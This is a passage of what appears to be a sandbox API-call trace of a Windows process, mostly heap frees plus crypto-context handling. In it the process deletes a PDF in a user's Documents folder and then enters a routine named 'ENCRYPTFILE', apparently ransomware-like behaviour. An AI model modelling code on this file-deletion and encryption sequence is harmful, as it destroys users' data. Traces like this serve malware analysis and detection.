dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.692] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.692] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.693] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.693] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.693] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.693] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.694] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0079.695] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.695] CryptReleaseContext (hProv=0x41a4ae0, dwFlags=0x0) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.696] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.696] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.696] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0079.696] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.696] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.697] CloseHandle (hObject=0x258) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.697] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.697] CloseHandle (hObject=0x298) returned 1 [0079.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.699] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf", lpFilePart=0x0) returned 0x2f [0079.699] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ko5kmbwijv.pdf")) returned 0x20 [0079.700] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a6b8c0, ftCreationTime.dwHighDateTime=0x1d5eade, ftLastAccessTime.dwLowDateTime=0x58f88120, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0x58f88120, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xadcc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Ko5KMbWIjv.pdf", cAlternateFileName="KO5KMB~1.PDF")) returned 0x41ac280 [0079.700] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ko5kmbwijv.pdf")) returned 1 [0079.704] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a6b8c0, ftCreationTime.dwHighDateTime=0x1d5eade, ftLastAccessTime.dwLowDateTime=0x58f88120, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0x58f88120, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xadcc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Ko5KMbWIjv.pdf", cAlternateFileName="KO5KMB~1.PDF")) returned 0 [0079.704] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.704] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0079.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) 